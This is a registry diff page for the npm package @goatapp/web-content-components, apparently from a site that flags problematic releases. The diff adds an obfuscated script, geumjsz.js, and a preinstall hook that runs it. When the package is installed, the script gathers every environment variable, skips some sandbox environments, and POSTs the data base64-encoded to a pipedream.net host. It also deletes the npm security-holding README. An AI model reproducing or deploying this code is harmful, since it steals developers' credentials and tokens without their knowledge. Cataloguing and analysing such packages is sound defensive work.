@goatapp/web-content-components 0.0.1-security → 8.981.673
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/geumjsz.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/geumjsz.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x36655d=a0_0x3cc5;(function(_0x1071d7,_0x212528){const _0x2ebfc6=a0_0x3cc5,_0x14bcc4=_0x1071d7();while(!![]){try{const _0x445db5=-parseInt(_0x2ebfc6(0x158))/0x1+-parseInt(_0x2ebfc6(0x167))/0x2*(-parseInt(_0x2ebfc6(0x161))/0x3)+parseInt(_0x2ebfc6(0x163))/0x4+parseInt(_0x2ebfc6(0x154))/0x5*(parseInt(_0x2ebfc6(0x16c))/0x6)+-parseInt(_0x2ebfc6(0x16a))/0x7*(parseInt(_0x2ebfc6(0x15a))/0x8)+parseInt(_0x2ebfc6(0x157))/0x9+parseInt(_0x2ebfc6(0x16e))/0xa*(parseInt(_0x2ebfc6(0x169))/0xb);if(_0x445db5===_0x212528)break;else _0x14bcc4['push'](_0x14bcc4['shift']());}catch(_0x4c9ff6){_0x14bcc4['push'](_0x14bcc4['shift']());}}}(a0_0x3768,0x1f40b));function a0_0x3768(){const _0x5795e1=['7tTwptE','pipedream','68466xjjwuG','toString','440fmNVBV','25MlNbVH','POST','npm_config_registry','199179XluByj','227755duLjtS','USERNAME','1548616VfiWKD','length','stringify','net','taobao.org','https','end','132pIWNzk','error','224996avsOXM','some','env','join','5748yiTyak','write','71863MvCFMB'];a0_0x3768=function(){return _0x5795e1;};return a0_0x3768();}function a0_0x3cc5(_0x20f168,_0x5bcd77){const _0x3768a3=a0_0x3768();return a0_0x3cc5=function(_0x3cc59b,_0x54c357){_0x3cc59b=_0x3cc59b-0x154;let _0x336b29=_0x3768a3[_0x3cc59b];return _0x336b29;},a0_0x3cc5(_0x20f168,_0x5bcd77);}const http=require(a0_0x36655d(0x15f)),filter=[{'key':a0_0x36655d(0x156),'val':a0_0x36655d(0x15e)},{'key':'npm_config_registry','val':'tencent.com'},{'key':'npm_config_registry','val':'registry.npmmirror.com'},{'key':a0_0x36655d(0x159),'val':'daasadmin'},{'key':'_','val':'/usr/bin/python'}];function main(){const _0x40d27c=a0_0x36655d;var _0x254013=process[_0x40d27c(0x165)]||{};if(filter[_0x40d27c(0x164)](({key:_0xcd6b29,val:_0x287682})=>_0x254013[_0xcd6b29]&&_0x254013[_0xcd6b29]['includes'](_0x287682))||Object['keys'](_0x254013)[_0x40d27c(0x15b)]<0xa)return;req=http['request']({'host':['bd43527e019ae8efb47eb39bb9313ac5','m',_0x40d27c(0x16b),_0x40d27c(0x15d)][_0x40d27c(0x166)]('.'),'path':'/'+(_0x254013['npm_package_name']||''),'method':_0x40d27c(0x155)})['on'](_0x40d27c(0x162),function(_0x2af3da){}),req[_0x40d27c(0x168)](Buffer['from'](JSON[_0x40d27c(0x15c)](_0x254013))[_0x40d27c(0x16d)]('base64')),req[_0x40d27c(0x160)]();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "8.981.673",
|
|
4
|
+
"main": "geumjsz.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node geumjsz.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|